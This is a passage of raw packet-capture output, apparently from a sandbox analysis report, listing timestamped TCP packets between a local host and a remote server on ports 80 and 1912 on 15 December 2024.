                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.708956003 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.709620953 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.709742069 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.709888935 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.710563898 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.710773945 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.710916996 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.711585045 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.725050926 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.725193024 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.725421906 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.725532055 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.725696087 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.725861073 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.726402998 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.726494074 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.726524115 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.727020979 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.727138996 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.727330923 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.727965117 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.728037119 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.728063107 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.728996038 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.729028940 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.729151011 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.729818106 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.729882956 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.730020046 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.730698109 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.730756998 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.730828047 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.731630087 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.731734037 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.732547998 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.732635021 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.732656956 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.732656956 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.766196012 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.774631977 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.805819035 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.808505058 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.864939928 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.865037918 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.865149975 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.865530968 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.865554094 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.865613937 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.866030931 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.866153955 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.866939068 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.867069006 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.867175102 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.867254972 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.867919922 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.868014097 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.868141890 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.869064093 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.869153976 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.869254112 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.869815111 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.869934082 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.869975090 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.870671988 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.870835066 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.871536970 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.871593952 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.871624947 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.872452974 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.872517109 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.872551918 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.872590065 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.873374939 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.873502970 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.873655081 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.874305010 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.874407053 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.874528885 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.875227928 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.875365019 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.875509024 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.876130104 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.876252890 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.876981974 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.877051115 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.877182961 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.877322912 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.877984047 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.878104925 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.878878117 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.878976107 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.878997087 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.879018068 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.879823923 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.879996061 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.880726099 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.880835056 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.880845070 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.881656885 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.881668091 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.881732941 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.882630110 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.882754087 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.882788897 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.882807970 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.883496046 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.883615971 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.883745909 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.884404898 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.884547949 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.884663105 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.885411024 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.885477066 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.885580063 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.886281967 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.886327028 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.887192011 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.887293100 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.887305021 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.888087988 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.888192892 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.888211966 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.888250113 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.888988972 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.889130116 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.889235973 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.889942884 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.890070915 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.890185118 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.890829086 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.890994072 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.891091108 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.891773939 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.891894102 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.892678022 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.892776012 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.892811060 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.893610001 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.893716097 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.893749952 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.893790007 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.894591093 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.894670963 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.894774914 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.895479918 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.895589113 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.895692110 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.896392107 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.896493912 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.897376060 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.897387981 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.897464037 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.897546053 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.898401976 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.898483038 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.898588896 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.899152040 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.899336100 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.900069952 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.900173903 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.900178909 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.900965929 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.901063919 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.901101112 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.901139021 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.901900053 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.902045965 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.902142048 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.902815104 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.902934074 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.903027058 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.903754950 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.917150974 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.917210102 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.917431116 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.917454004 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.917623043 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.917735100 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.917771101 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.918930054 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.919022083 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.919105053 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.919142008 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.919747114 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.919889927 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.919996023 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.920595884 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.920706034 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.921156883 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.921328068 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.921427965 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.922229052 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.922326088 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.922415972 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.923175097 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.923240900 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.923281908 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.923295975 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.924052954 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.924149990 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.924249887 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.924969912 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.924983978 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.925091028 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.928174973 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.057312012 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.057389975 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.057529926 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.057717085 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.057888031 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.058605909 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.058645964 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.058701992 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.058758020 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.059516907 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.059644938 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.059684038 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.060771942 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.060897112 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.060934067 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.061358929 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.061552048 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.061592102 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.062304974 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.062469006 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.063236952 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.063288927 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.063345909 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.064136028 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.064213991 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.064265013 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.064311028 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.065094948 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.065180063 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.065229893 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.065949917 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.066072941 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.066812992 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.066880941 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.066977024 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.067801952 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.067861080 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.067941904 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.068701029 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.068768024 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.068814993 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.069655895 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.069705963 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.069752932 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.069791079 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.070549965 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.070663929 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.070734978 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.071479082 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.071588039 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.071643114 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.072386026 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.072498083 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.072551012 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.073319912 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.073441029 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.073493004 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.074234009 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.074343920 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.074397087 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.075143099 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.075272083 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.075324059 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.076093912 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.076293945 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.076345921 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.077014923 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.077153921 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.077301979 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.077914953 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.078018904 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.078124046 CET4970980192.168.2.8185.81.68.147
